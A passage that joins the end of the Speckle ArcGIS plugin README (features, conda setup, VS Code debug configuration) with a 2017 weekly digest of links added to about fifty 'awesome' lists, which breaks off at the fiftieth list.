droplet](https://img.shields.io/badge/Create%20a%20Droplet-0069ff?style=flat-square&logo=digitalocean&logoColor=white)](https://marketplace.digitalocean.com/apps/speckle-server?refcode=947a2b5d7dc1) ⇒ deploying an instance in 1 click ### Resources - [![Community forum users](https://img.shields.io/badge/community-forum-green?style=for-the-badge&logo=discourse&logoColor=white)](https://speckle.community) for help, feature requests or just to hang with other speckle enthusiasts, check out our community forum! - [![website](https://img.shields.io/badge/tutorials-speckle.systems-royalblue?style=for-the-badge&logo=youtube)](https://speckle.systems) our tutorials portal is full of resources to get you started using Speckle - [![docs](https://img.shields.io/badge/docs-speckle.guide-orange?style=for-the-badge&logo=read-the-docs&logoColor=white)](https://speckle.guide/dev/) reference on almost any end-user and developer functionality ![Untitled](https://user-images.githubusercontent.com/2679513/132021739-15140299-624d-4410-98dc-b6ae6d9027ab.png) ## Repo Structure This repo contains the ArcGIS plugin for Speckle 2.0. It is written in `python` and uses our fantastic [Python SDK](https://github.com/specklesystems/speckle-py). The [Speckle Server](https://github.com/specklesystems/Server) is providing all the web-facing functionality and can be found [here](https://github.com/specklesystems/Server). > **Try it out!!** > Although we're still in early development stages, we encourage you to try out the latest stable release. > Just follow the instructions on this file, and head to the [Releases page](https://github.com/specklesystems/speckle-arcgis/releases) to download the necessary files and dependencies. > > **What can it do?** > > Currently, the plugin allows to receive the data from Speckle and send data from a AcrGIS Pro layers to a Speckle server using one of the accounts configured on your computer. It will extract all the features of that layer along side their properties. > The following geometry types are supported for now: > > - Point > - Multipoint > - Polyline > - Polygon > - **More to come!!** > > If you have questions, you can always find us at our [Community forum](https://speckle.community) ## Developing ### Setup Setup is adapted from [this tutorial](https://pro.arcgis.com/en/pro-app/2.8/arcpy/get-started/debugging-python-code.htm) #### Dev Environment For a better development experience in your editor, we recommend creating a [virtual conda environment in ArcGIS](https://pro.arcgis.com/en/pro-app/2.8/arcpy/get-started/work-with-python-environments.htm). In the new conda environment, you'll just need to install `specklepy` and `panda3d`. ### Debugging #### Visual Studio Code In VS Code, you can use the built in python debugger. You'll need to create a debug configuration by creating a `launch.json` file. ![Create Debug Config](https://user-images.githubusercontent.com/2316535/129895259-3b9ede24-a898-4dbd-86df-0d15f19a2714.png) Select the "Python" -> "Remote Attach" option. Your `launch.json` should look like this: ```json { "version": "0.2.0", "configurations": [ { "name": "Python: Attach using Process Id", "type": "python", "request": "attach", "processId": "${command:pickProcess}", "justMyCode": true } ] } ``` To start debugging, you'll need to first launch ArcGIS. Once it's running, run your debug `Python: Remote Attach` configuration and select ArcGISPro.exe from the dropdown. For now, the breakpoints are only hit in the _init_ part of your Toolbox classes, but it's a [known limitation](https://community.esri.com/t5/python-questions/has-anyone-successfully-attached-the-vscode/td-p/1092605) Enjoy!
# Awesome List Updates on Oct 09 - Oct 15, 2017 51 awesome lists updated this week. [🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/week/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung) ## [1. Awesome Fp Js](/content/stoeffel/awesome-fp-js/week/README.md) ### Resources / Examples and Exercises * [Learn Rx](http://reactivex.io/learnrx/) – A series of interactive exercises introducing five basic ingredients of functional (reactive) programming: the `map`, `filter`, `concatAll`, `reduce`, and `zip` functions. ## [2. Awesome Preact](/content/preactjs/awesome-preact/week/README.md) ### Contents / Components * [Preact Level List (⭐5)](https://github.com/juliangruber/preact-level-list) - Live updating leveldb list component for Preact. ## [3. Awesome Deep Learning](/content/ChristosChristofidis/awesome-deep-learning/week/README.md) ### Researchers / Websites * [Guide to Machine Learning](http://yerevann.com/a-guide-to-deep-learning/) * [Deep Learning for Beginners](https://spandan-madan.github.io/DeepLearningProject/) ## [4. Awesome Clojure](/content/razum2um/awesome-clojure/week/README.md) ### Guides * [Clojure by Example](https://kimh.github.io/clojure-by-example/) ## [5. Awesome Dataviz](/content/javierluraschi/awesome-dataviz/week/README.md) ### JavaScript tools / Maps * [Mapael (⭐1k)](https://github.com/neveldo/jQuery-Mapael) - jQuery plugin based on raphael.js to display vector maps. ## [6. Awesome Static Website Services](/content/agarrharr/awesome-static-website-services/week/README.md) ### Forms / Really Simple Forms * [99 Inbound](https://www.99inbound.com) - Form endpoint service with email/Slack notifications and third party app integrations (e.g. MailChimp) ## [7. Awesome Nodejs](/content/sindresorhus/awesome-nodejs/week/README.md) ### Resources / Tools * [github-npm-stats](https://chrome.google.com/webstore/detail/github-npm-stats/oomfflokggoffaiagenekchfnpighcef) - Chrome extension that displays npm download stats on GitHub. ## [8. Awesome Idris](/content/joaomilho/awesome-idris/week/README.md) ### Contents / Books * [Type Driven Development With Idris](https://www.manning.com/books/type-driven-development-with-idris) - Most important book published so far. ### Contents / Papers * [Elaborator Reflection: Extending Idris in Idris](https://eb.host.cs.st-andrews.ac.uk/drafts/elab-reflection.pdf) - David Christiansen and Edwin Brady, 2016. * [Cross-platform Compilers for Functional Languages](https://eb.host.cs.st-andrews.ac.uk/drafts/compile-idris.pdf) - Edwin Brady, 2015. * [Programming and Reasoning with Side-Effects in Idris](https://eb.host.cs.st-andrews.ac.uk/drafts/eff-tutorial.pdf) - Edwin Brady, 2014. * [Idris, a General Purpose Dependently Typed Programming Language: Design and Implementation](https://pdfs.semanticscholar.org/1407/220ca09070233dca256433430d29e5321dc2.pdf) - Edwin Brady, 2013. * [Programming and Reasoning with Algebraic Effects and Dependent Types](https://eb.host.cs.st-andrews.ac.uk/drafts/effects.pdf) - Edwin Brady, 2013. * [Sequential decision problems, dependently typed solutions](http://eb.host.cs.st-andrews.ac.uk/writings/plmms13.pdf) - Nicola Botta, Cezar Ionescu and Edwin Brady, 2013. * [Programming in Idris: a tutorial](http://eb.host.cs.st-andrews.ac.uk/writings/idris-tutorial.pdf) - Edwin Brady, 2012. * [Idris — Systems Programming Meets Full Dependent Types](https://eb.host.cs.st-andrews.ac.uk/writings/plpv11.pdf) - Edwin Brady, 2011. * [Scrapping your Inefficient Engine: using Partial Evaluation to Improve Domain-Specific Language Implementation](http://eb.host.cs.st-andrews.ac.uk/writings/icfp10.pdf) - Edwin Brady and Kevin Hammond, 2010. * [Correct-by-Construction Concurrency: using Dependent Types to Verify Implementations of Effectful Resource Usage Protocols](http://eb.host.cs.st-andrews.ac.uk/writings/fi-cbc.pdf) - Edwin Brady and Kevin Hammond, 2010. * [Domain Specific Languages (DSLs) for Network Protocols](http://eb.host.cs.st-andrews.ac.uk/drafts/ngna2009-dsl.pdf) - Saleem Bhatti, Edwin Brady, Kevin Hammond and James McKinna, 2009. * [Lightweight Invariants with Full Dependent Types](http://eb.host.cs.st-andrews.ac.uk/drafts/tfp08.pdf) - Edwin Brady, Christoph Herrmann and Kevin Hammond, 2008. ### Contents / Presentations * [Idris: General Purpose Programming with Dependent Types](https://www.youtube.com/watch?v=vkIlW797JN8) - Presentation by Edwin Brady, Idris' creator. ### Contents / Projects * [GitHub's trending Idris repos](https://github.com/trending/idris) * [iridium (⭐201)](https://github.com/puffnfresh/iridium) - xmonad with the X11 abstracted and configured with Idris. * [lightyear (⭐235)](https://github.com/ziman/lightyear) - Parser combinators for Idris. * [quantities (⭐151)](https://github.com/timjb/quantities) Type-safe physical computations and unit conversions in Idris. * [idris-type-providers (⭐84)](https://github.com/david-christiansen/idris-type-providers) - Type provider library for Idris. * [IdrisScript (⭐88)](https://github.com/idris-hackers/IdrisScript) - FFI Bindings to interact with the unsafe world of JavaScript. * [idris-containers (⭐94)](https://github.com/jfdm/idris-containers) - Various data structures for use in the Idris Language. * [IdrisSqlite (⭐39)](https://github.com/david-christiansen/IdrisSqlite) - Effectful bindings for SQLite. * [idris-http (⭐39)](https://github.com/uwap/idris-http) - HTTP library for Idris. * [RingIdris (⭐20)](https://github.com/FranckS/RingIdris) - Ring solver for Idris. * [specdris (⭐57)](https://github.com/pheymann/specdris) - Test framework for Idris. * [idris-config (⭐19)](https://github.com/jfdm/idris-config) - Parsers for various configuration files written in Idris. * [probability (⭐32)](https://github.com/BlackBrane/probability) - Probabilistic computation in Idris. * [idris-protobuf (⭐28)](https://github.com/google/idris-protobuf) - Partial implementation of Protocol Buffers in Idris. * [idris-free (⭐25)](https://github.com/idris-hackers/idris-free) - Free Monads and useful constructions to work with them. ### Contents / Backends * [idris-jvm (⭐378)](https://github.com/mmhelloworld/idris-jvm) - JVM bytecode backend for Idris. * [idris-llvm (⭐77)](https://github.com/idris-hackers/idris-llvm) - LLVM backend. * [idris-erlang (⭐190)](https://github.com/lenary/idris-erlang) - Erlang backend. * [idris-malfunction (⭐80)](https://github.com/stedolan/idris-malfunction) - Experimental Malfunction (OCaml internal representation) backend. ### Contents / Community * [GitHub organization](https://github.com/idris-hackers) ## [9. Awesome Deep Learning Resources](/content/guillaume-chevalier/Awesome-Deep-Learning-Resources/week/README.md) ### Papers / Convolutional Neural Networks * [Densely Connected Convolutional Networks](https://arxiv.org/pdf/1608.06993.pdf) - Best Paper Award at CVPR 2017, yielding improvements on state-of-the-art performances on CIFAR-10, CIFAR-100 and SVHN datasets, this new neural network architecture is named DenseNet. ## [10. Awesome Ddd](/content/heynickc/awesome-ddd/week/README.md) ### Books * [Writing Great Specifications](https://www.manning.com/books/writing-great-specifications) - Writing Great Specifications is an example-rich tutorial that teaches you how to write good Gherkin specification documents that take advantage of Specification by Example's benefits. ## [11. Awesome Ctf](/content/apsdehal/awesome-ctf/week/README.md) ### Wargames * [Hack The Box](https://www.hackthebox.eu) - Weekly CTFs for all types of security enthusiasts. ## [12. Awesome Android](/content/JStumpp/awesome-android/week/README.md) ### GUI / Video * [VideoPlayView (⭐90)](https://github.com/MarcinMoskala/VideoPlayView) - Custom Android view with video player, play/stop, loader and placeholder image. ## [13. Awesome Micro Npm Packages](/content/parro-it/awesome-micro-npm-packages/week/README.md) ### Modules / Function * [throttle-debounce (⭐886)](https://github.com/niksy/throttle-debounce) - Throttle/debounce your functions. ## [14. Awesome No Login Web Apps](/content/aviaryan/awesome-no-login-web-apps/week/README.md) ### Miscellaneous / Others * [AlarmDJ](https://alarmdj.com) - Online Alarm clock, use MP3 files and YouTube videos as alarm. ## [15. Awesome Coins](/content/Zheaoli/awesome-coins/week/README.md) ### ☤ Reading Material * [r/CryptoCurrency](https://www.reddit.com/r/CryptoCurrency/) — Official subreddit about crypto-currencies and crypto-assets. ## [16. Awesome Jvm](/content/deephacks/awesome-jvm/week/README.md) ### Virtual Machines * [Eclipse OpenJ9 (⭐3k)](https://github.com/eclipse/openj9) - Eclipse OpenJ9. ## [17. Citizen Science](/content/dylanrees/citizen-science/week/README.md) ### Software / Publishing , Collaboration and Organization * [RapidPro (⭐778)](https://github.com/rapidpro/rapidpro) - An open-source platform for building scalable applications that users can interact with via SMS. ### Literature / Citizen Science Practice * [Spectrophotometric Determination of Lead](http://www.pharmtech.com/spectrophotometric-determination-lead) - Another simple DIY lead testing procedure. ## [18. Awesome Ruby](/content/markets/awesome-ruby/week/README.md) ### Captchas and anti-spam * [Invisible Captcha (⭐1k)](https://github.com/markets/invisible_captcha) - Unobtrusive and flexible spam protection based on the honeypot strategy. It also provides a time-sensitive form submission. * [Rakismet (⭐354)](https://github.com/joshfrench/rakismet) - Easy Akismet and TypePad AntiSpam integration for Rails. * [reCAPTCHA (⭐1.9k)](https://github.com/ambethia/recaptcha) - reCaptcha API helpers for ruby apps. * [Voight-Kampff (⭐170)](https://github.com/biola/Voight-Kampff) - A Ruby gem that detects bots, spiders, crawlers and replicants. ### Concurrency and Parallelism * [forkoff (⭐73)](https://github.com/ahoward/forkoff) - brain-dead simple parallel processing for ruby. * [Parallel (⭐4k)](https://github.com/grosser/parallel) - Run any code in parallel Processes (> use all CPUs) or Threads (> speedup blocking operations). Best suited for map-reduce or e.g. parallel downloads/uploads. ### Database Tools * [connection\_pool (⭐1.5k)](https://github.com/mperham/connection_pool) - Generic connection pooling for Ruby, that can be used with anything, e.g. Redis, Dalli, etc. ### Diff * [Diffy (⭐1.2k)](https://github.com/samg/diffy) - Easy Diffing With Ruby. * [gemdiff (⭐122)](https://github.com/teeparham/gemdiff) - Find source repositories for gems. Open, compare, and update outdated gem versions. * [JsonCompare (⭐57)](https://github.com/a2design-inc/json-compare) - Returns the difference between two JSON files. ### File Upload * [Shrine (⭐3.1k)](https://github.com/janko-m/shrine) - Toolkit for handling file uploads in Ruby. ### File System Listener * [Guard (⭐6.2k)](https://github.com/guard/guard) - A command line tool to easily handle events on file system modifications. ### HTTP Clients and tools * [Device Detector (⭐695)](https://github.com/podigee/device_detector) - A precise and fast user agent parser and device detector, backed by the largest and most up-to-date user agent database. ### IRB * [Clipboard (⭐339)](https://github.com/janlelis/clipboard) - Access to the system clipboard on Linux, MacOS and Windows. * [Looksee (⭐365)](https://github.com/oggy/looksee) - A tool for illustrating the ancestry and method lookup path of objects. Handy for exploring unfamiliar codebases. ### Machine Learning * [Awesome Machine Learning with Ruby (⭐1.9k)](https://github.com/arbox/machine-learning-with-ruby) - A Curated List of Ruby Machine Learning Links and Resources. ### Queues and Messaging * [Karafka (⭐1.7k)](https://github.com/karafka/karafka) - Framework used to simplify Apache Kafka (a distributed streaming platform) based Ruby applications development. ### Web Frameworks * [Rack::App (⭐403)](https://github.com/rack-app/rack-app) - Bare bone minimalistic framework for building rack apps. ## [19. Awesome Bigdata](/content/newTendermint/awesome-bigdata/week/README.md) ### RDBMS * [Teradata](http://www.teradata.com/products-and-services/teradata-database/) - high-performance MPP data warehouse platform. ### Distributed Filesystem * [Apache Kudu](http://kudu.apache.org/) - Hadoop's storage layer to enable fast analytics on fast data. ### Time-Series Databases * [Axibase Time Series Database](http://axibase.com/products/axibase-time-series-database/) - Integrated time series database on top of HBase with built-in visualization, rule-engine and SQL support. ### SQL-like processing * [Aster Database](http://www.teradata.com/products-and-services/Teradata-Aster/teradata-aster-database) - SQL-like analytic processing for MapReduce. ### Applications * [AthenaX (⭐1.2k)](https://github.com/uber/AthenaX) - a streaming analytics platform that enables users to run production-quality, large scale streaming analytics using Structured Query Language (SQL). ## [20. Rbooks](/content/RomanTsegelskyi/rbooks/week/README.md) ### Advanced Books #### R for Data Science [\[Online\]](http://r4ds.had.co.nz/) *Free* <img src="http://ecx.images-amazon.com/images/I/51XHOt2Tt8L._SY344_BO1,204,203,200_.jpg" width="200px"/> Learn how to use R to turn raw data into insight, knowledge, and understanding. This book introduces you to R, RStudio, and the *[tidyverse](https://www.tidyverse.org/)*, a collection of R packages designed to work together to make data science fast, fluent, and fun. Suitable for readers with no previous programming experience, R for Data Science is designed to get you doing data science as quickly as possible. ## [21. Awesome Mastodon](/content/tleb/awesome-mastodon/week/README.md) ### Tools * [Last](https://framagit.org/luc/last) - Aggregate toots on a web page providing Atom feed and an epub (Perl). ## [22. Awesome Regression Testing](/content/mojoaxel/awesome-regression-testing/week/README.md) ### Slideshows, talks and videos * [Visual Regression Testing with Shoov](https://youtu.be/CBBiJ6YlXLc) - How to setup shoov and get your first test written. * [Visual Regression Testing with PhantomCSS](https://youtu.be/Vp8vnXMjIfw) - Talk by Jon Bellah on how to use PhantomCSS during wordpress development. * [Visual Regression Testing: Sanity Checks With BackstopJS](https://youtu.be/l8lGj8Zh0k4) - Screencast with code demo and best practices. * [Screenster Tutorial](https://youtu.be/Zy8y_dGzZXI) - Tutorial on how to create visual automated tests with Screenster. * [Look-alike - visual regression testing tool](https://youtu.be/vTyoQuC0To8) - Demo what the Look-alike Chrome extension is, how it works and how and why it was build. * [Screencast on CSS critic - a lightweight testing framework for CSS](https://youtu.be/AqQ2bNPtF60) - How to write your first CSS test with CSS critic, make it pass, break it, and make it pass again. ## [23. Awesome Creative Coding](/content/terkelg/awesome-creative-coding/week/README.md) ### Visual Programming Languages * [XOD](https://xod.io/) \[Cross-platform] - Open source visual programming language and environment for microcontroller-based projects. ## [24. Awesome Remote Job](/content/lukasz-madon/awesome-remote-job/week/README.md) ### Tools / Communication * [Rocket.Chat](https://rocket.chat/) — The Ultimate Open Source WebChat Platform. ## [25. Awesome Hacking Locations](/content/daviddias/awesome-hacking-locations/week/README.md) ### Portugal 🇵🇹 / Lisbon #### Confeitaria Lisboa > Well lit, great croissants. Webpage: <http://4sq.com/1JRQG4q> | Wifi | Power | Climatization | Address | Open Hours | | ---- | ----- | ------------- | -------------------------------------------- | ------------------ | | ✔ | ✔ | ❄️/♨️ | [Av. Joao XXI Lisboa](https://goo.gl/AadA8A) | Mon-Sat 7:30AM:8PM | #### Royale Café > Quiet and friendly staff. A bit on the pricey $$ side though. Webpage: <http://www.royalecafe.com> | Wifi | Power | Climatization | Address | Open Hours | | ---- | ----- | ------------- | ------------------------------------------------------------------------------- | ----------------------------------- | | ✔ | ✔ | ❄️/♨️ | [Largo Rafael Bordalo Pinheiro 29 R/C Lisboa](https://goo.gl/maps/Eho6a8ufqRQ2) | Mon-Wed 12-11pm & Thu-Sun 12pm-12am | ### United States 🇺🇸 / Illinois #### Refinery > Great coffee and usually has available seating. Wifi is *bad*. Webpage: <http://the-refinery.cafes-city.com/> | Wifi | Power | Coffee | Address | Open Hours | | ---- | ----- | ------ | --------------------------------------------------------------------------------- | ------------------------------------------------ | | (✔) | ✔ | ✔ | [413 Santa Monica Blvd, Santa Monica, CA 90401](https://goo.gl/maps/uBJQacVNWd62) | Mon-Fri 7:30-18:00, Sat 8:00-18:00, Sun *closed* | ### United States 🇺🇸 / Massachusetts <a id="massachusetts"> </a> #### Diesel Cafe > Same good food as Bloc 11 and Forge, larger, more industrial, busy but always a space, standing desks at back, lots of resident coders. Acid coffee. Webpage: <http://www.diesel-cafe.com/> | Wifi | Power | Coffee | Address | Open Hours | | ------ | ----- | ------ | ------------------------------------------------------------------- | ---------------------------------------- | | paying | ✔ | ✔ | [257 Elm St, Somerville, MA 02144](https://goo.gl/maps/a8i57bKwvDz) | Mon-Fri 06:00-23:00, Sat-Sun 07:00-23:00 | Notes: * Contact [@richlitt](https://twitter.com/richlitt) for wifi password if needed. * You get 45m of free wifi per day. More if you know what you're doing ;) (but $14/mo for wifi is worth it if you hack there often) * Using IPFS will get you kicked off their network in \~2hr (FYI). ## [26. Awesome Open Source Supporters](/content/zachflower/awesome-open-source-supporters/week/README.md) ### Dependency Management * [Greenkeeper](https://greenkeeper.io/) - Automated dependency management for NPM packages (on GitHub). ### Exception Reporting * [BugSnag](https://www.bugsnag.com/) `requires-approval` - Exception tracking and reporting. ## [27. Toolsforactivism](/content/drewrwilson/toolsforactivism/week/README.md) ### Browsers: * [Tor Browser (⭐450)](https://github.com/TheTorProject/gettorbrowser) - Free software for enabling anonymous communication. It prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked. ## [28. Awesome Dotnet](/content/quozd/awesome-dotnet/week/README.md) ### Misc * [SystemWrapper (⭐168)](https://github.com/jozefizso/SystemWrapper) - SystemWrapper is .NET library for easier testing of system APIs. ## [29. Awesome Ava](/content/avajs/awesome-ava/week/README.md) ### Articles * [Effortless unit testing with AVA](https://wecodetheweb.com/2016/04/19/effortless-unit-testing-with-ava/) ### Videos * [Testing React components with AVA](https://www.youtube.com/watch?v=RxLW6-3dk5A) ## [30. Awesome Electron](/content/sindresorhus/awesome-electron/week/README.md) ### Closed Source / Other * [Twitch](https://app.twitch.tv) - Official Twitch app. ### Books / Other * [Cross-Platform Desktop Applications](https://www.manning.com/books/cross-platform-desktop-applications) 💲 ## [31. Awesome Vulkan](/content/vinjn/awesome-vulkan/week/README.md) ### Books * [Introduction to Computer Graphics and the Vulkan API](https://www.amazon.com/Introduction-Computer-Graphics-Vulkan-API/dp/1548616176) by **Kenwright** - Introduce the reader to the exciting topic of computer graphics from a grounds-up practical perspective with the Vulkan API. ## [32. Awesome Ssh](/content/moul/awesome-ssh/week/README.md) ### Apps / *SSH* agent * [sshecret (⭐58)](https://github.com/thcipriani/sshecret) - Automatically create and manage multiple agents for multiple keys. ## [33. Awesome Machine Learning](/content/josephmisiti/awesome-machine-learning/week/README.md) ### Python / General-Purpose Machine Learning * [Edward](http://edwardlib.org/) - A library for probabilistic modelling, inference, and criticism. Built on top of TensorFlow. ## [34. Awesome Artificial Intelligence](/content/owainlewis/awesome-artificial-intelligence/week/README.md) ### Courses * [Deep Learning](http://www.deeplearningbook.org/) - Goodfellow, Bengio and Courville's introduction to a broad range of topics in deep learning, covering mathematical and conceptual background, deep learning techniques used in industry, and research perspectives. * [The Elements of Statistical Learning: Data Mining, Inference, and Prediction](https://web.stanford.edu/\~hastie/ElemStatLearn/) - Hastie and Tibshirani cover a broad range of topics, from supervised learning (prediction) to unsupervised learning including neural networks, support vector machines, classification trees and boosting---the first comprehensive treatment of this topic in any book. ## [35. Awesome Hacking](/content/Hack-with-Github/Awesome-Hacking/week/README.md) ### Other useful repositories - Repository: [Adversarial Machine Learning (⭐1.6k)](https://github.com/yenchenlin/awesome-adversarial-machine-learning) Description: Curated list of awesome adversarial machine learning resources - Repository: [AI Security (⭐1.1k)](https://github.com/RandomAdversary/Awesome-AI-Security) Description: Curated list of AI security resources - Repository: [Web Security (⭐8.8k)](https://github.com/qazbnm456/awesome-web-security) Description: Curated list of Web Security materials and resources ## [36. Awesome Security](/content/sbilly/awesome-security/week/README.md) ### Endpoint / Mobile / Android / iOS * [OSX Security Awesome (⭐666)](https://github.com/kai5263499/osx-security-awesome) - A collection of OSX and iOS security resources ### Web / Development * [Understanding API Security](https://www.manning.com/books/understanding-api-security) - Free eBook sampler that gives some context for how API security works in the real world by showing how APIs are put together and how the OAuth protocol can be used to protect them. ### Usability / Development * [Usable Security Course](https://pt.coursera.org/learn/usable-security) - Usable Security course at coursera. Quite good for those looking for how security and usability intersects. ## [37. Awesome Audio Visualization](/content/willianjusten/awesome-audio-visualization/week/README.md) ### Libraries Visualization * [Vuo](https://vuo.org) — A realtime visual programming language for interactive media. ## [38. Awesome Python Scientific Audio](/content/faroit/awesome-python-scientific-audio/week/README.md) ### Audio Related Packages / Transformations - General DSP * [PyWavelets](http://pywavelets.readthedocs.io) [:octocat: (⭐1.7k)](https://github.com/PyWavelets/pywt) [:package:](https://pypi.python.org/pypi/PyWavelets) - Discrete Wavelet Transform in Python. ## [39. Awesome4girls](/content/cristianoliveira/awesome4girls/week/README.md) ### Events/Meetups / Javascript * [JsLadies BR](https://github.com/jsladiesbr) - *Loc:* <img src="https://upload.wikimedia.org/wikipedia/en/0/05/Flag_of_Brazil.svg" alt="Brazil" width="30"> - *Lang: PT-BR only* A group for women interested in web development and javascript with open and free meetings, workshops and talks. ### General / UX * [Ada Lovelace Day](https://findingada.com/) Ada Lovelace Day, a yearly holiday held on the second Tuesday in the month of October, is an international holiday to celebrate women in STEM fields. It is a day to celebrate contributions made in STEM fields by women, and to encourage other women to pursue those fields by raising awareness of those contributions. There is a main event, held in London, England, but anyone can celebrate ALD by organizing an event or sharing their own story online. ### Other Initiatives / Content * [WomenTechmakers](https://www.womentechmakers.com/) Google's global program providing visibility, community, & resources for women in technology. Provides resources to women starting their career and women with an established career in tech to further their success. ## [40. Awesome Typescript](/content/dzharii/awesome-typescript/week/README.md) ### Books * :books: [Angular 2 Development with TypeScript (2016)](https://www.manning.com/books/angular-2-development-with-typescript) by Yakov Fain and Anton Moiseev; Manning ## [41. Awesome Aws](/content/donnemartin/awesome-aws/week/README.md) ### Open Source Repos / Elastic Beanstalk * [eb-py-flask-signup :fire::fire: (⭐271)](https://github.com/awslabs/eb-py-flask-signup) - Python signup form app with Flask and Bootstrap. ## [42. Awesome Network Analysis](/content/briatte/awesome-network-analysis/week/README.md) ### Software / Python * [Snap.py](http://snap.stanford.edu/snappy/index.html) - A Python interface for SNAP (a general purpose, high performance system for analysis and manipulation of large networks). * [SnapVX (⭐64)](https://github.com/snap-stanford/snapvx) - A convex optimization solver for problems defined on a graph. ## [43. Awesome Cpp](/content/fffaraz/awesome-cpp/week/README.md) ### Standard Libraries * [The GNU C Library](https://www.gnu.org/software/libc/manual) - The purpose of this manual is to tell you how to use the facilities of the GNU C Library. ## [44. Awesome Mqtt](/content/hobbyquaker/awesome-mqtt/week/README.md) ### Smart Home Hardware Interfaces / Firmwares for ESP based Devices * [HS100toMQTT (⭐16)](https://github.com/dersimn/HS100toMQTT) - Gateway between TPLink HS100/HS110 and MQTT. ### Home Entertainment / Firmwares for ESP based Devices * [htd2mqtt (⭐3)](https://github.com/TheOriginalAndrobot/htd2mqtt) - Bridge between an HTD Lync audio system and MQTT. ### Misc / Firmwares for ESP based Devices * [mqttclpro (⭐90)](https://github.com/dc297/mqttclpro) - MQTT Client with tasker integration Android app. ## [45. Awesome Speaking](/content/matteofigus/awesome-speaking/week/README.md) ### Blog Posts * [Block Your Talk](http://eleganthack.com/block-your-talk/) - by **Christina Wodtke** * [How To Get Speaking Engagements](https://www.samjarman.co.nz/blog/speaking-gigs) - by **Sam Jarman** * [Presenting is Performance](http://eleganthack.com/presenting-is-performance/) - by **Christina Wodtke** ## [46. Awesome Swift](/content/matteocrippa/awesome-swift/week/README.md) ### Animation * [ViewAnimator (⭐6.9k)](https://github.com/marcosgriselli/ViewAnimator) - Brings your UI to life with just one line. ### Dependency Injection * [Corridor (⭐60)](https://github.com/symentis/Corridor) - A Coreader-like Dependency Injection μFramework. ### Auto Layout / Barcode * [Bamboo (⭐74)](https://github.com/wordlessj/Bamboo) - Auto Layout (and manual layout) in one line. ### UI / Barcode * [SwiftyUI (⭐338)](https://github.com/haoking/SwiftyUI) - High performance and lightweight UIView, UIImage, UIImageView, UIlabel, UIButton and more. ### Utility / Barcode * [Closures (⭐1.7k)](https://github.com/vhesener/Closures) - Swifty closures for UIKit and Foundation. ## [47. Awesome Linux](/content/inputsh/awesome-linux/week/README.md) ### X Windows Managers / Other Desktop Environments * [9wm](http://unauthorised.org/dhog/9wm.html) - Window manager that attempts to emulate the Plan 9 window manager 8-1/2 as far as possible within the constraints imposed by X. * [dwm](http://dwm.suckless.org/) - Dynamic window manager for X. It manages windows in tiled, monocle and floating layouts. All of the layouts can be applied dynamically, optimising the environment for the application and task performed. * [Enlightenment](http://www.enlightenment.org/) - Window manager bundled with a whole suite of libraries to help you create beautiful user interfaces. * [Fluxbox](http://www.fluxbox.org/) - Window manager for X, lightweight and easy to handle but full of features to make an easy and fast desktop experience. Built using C++. * [FVWM](http://fvwm.org/) - ICCCM-compliant multiple virtual desktop window manager for X. Extremely powerful. * [i3](http://i3wm.org/) - Tiling window manager. BSD-licensed. Primarily targeted at advanced users and developers. * [JWM](http://www.joewing.net/projects/jwm/) - Lightweight window manager for X11. Good choice for older and/or less powerful systems, though perfectly capable of running on modern systems. Built using C. * [ratpoison](http://www.nongnu.org/ratpoison/) - A simple window manager with no library dependencies, no graphics, and no decorations. Modeled after GNU Screen. * [Sawfish](http://sawfish.tuxfamily.org/) - Extensible window manager. Its aim is to manage windows in the most flexible and attractive manner possible. Built using Lisp-based scripting language. * [wmii](https://code.google.com/p/wmii/) - Small, scriptable window manager, with a 9P filesystem interface and an acme-like layout. * [xmonad](http://xmonad.org/) - Dynamically tiling X11 window manager. Makes work easier by automating aligning and searching for windows. Built using Haskell. ## [48. Awesome Vehicle Security](/content/jaredthecoder/awesome-vehicle-security/week/README.md) ### Articles * [How big data will impact car security in the proximate future: Concerns and solutions](http://bigdata-madesimple.com/big-data-will-impact-car-security-proximate-future-concerns-solutions/) - Impact of big data on car security. ### Presentations * [Self-Driving and Connected Cars: Fooling Sensors and Tracking Drivers](https://www.youtube.com/watch?v=C29UGFsIWVI) - Black Hat talk by Jonathan Petit. Automated and connected vehicles are the next evolution in transportation and will improve safety, traffic efficiency and driving experience. This talk will be divided in two parts: 1) security of autonomous automated vehicles and 2) privacy of connected vehicles. 2015 * [A Survey of Remote Automotive Attack Surfaces](https://www.youtube.com/watch?v=MAGacjNw0Sw) - Black Hat talk By Charlie Miller and Chris Valasek. Automotive security concerns have gone from the fringe to the mainstream with security researchers showing the susceptibility of the modern vehicle to local and remote attacks. Discussion of vehicle attack surfaces. 2014. ## [49. Awesome Dotnet Core](/content/thangchung/awesome-dotnet-core/week/README.md) ### Frameworks, Libraries and Tools / SDKs * [octokit.net (⭐2.4k)](https://github.com/octokit/octokit.net) - GitHub API client library for .NET. ### Frameworks, Libraries and Tools / Serialization * [Schema.NET (⭐543)](https://github.com/RehanSaeed/Schema.NET) - Schema.org objects turned into strongly typed C# POCO classes for use in .NET. All classes can be serialized into JSON/JSON-LD and XML, typically used to represent structured data in the head section of html page. ### Articles / Workflow * Basic knowledge * [Microsoft architectural overview of comprehensive BikeSharing360 suite of demo apps with related videos](https://blogs.msdn.microsoft.com/visualstudio/2016/12/14/connectdemos-2016-bikesharing360-on-github/) * [Porting a .NET Framework library to .NET Core](https://www.codeproject.com/Articles/1190475/Porting-a-NET-Framework-library-to-NET-Core) * [The 68 things the CLR does before executing a single line of your code](http://mattwarren.org/2017/02/07/The-68-things-the-CLR-does-before-executing-a-single-line-of-your-code/) * The comparison between .NET Core and Nodejs at [here](https://manuel-rauber.com/2016/03/07/node-js-asp-net-core-1-0-a-usage-comparison/), [here](https://gist.github.com/ilyaigpetrov/f6df3e6f825ae1b5c7e2) and [here (⭐46)](https://github.com/thinktecture/nodejs-aspnetcore-webapi) * [Understanding ASP.NET Core Initialization](http://developer.telerik.com/featured/understanding-asp-net-core-initialization/) * [Why you should join .NET Core and ASP.NET Core train](https://codingblast.com/why-you-should-join-asp-net-core/) ### Community / Workflow * [Slack](http://tattoocoder.com/aspnet-slack-sign-up) ## [50. Mind Expanding Books](/content/hackerkid/Mind-Expanding-Books/week/README.md) ### Philosophy And Psychology - 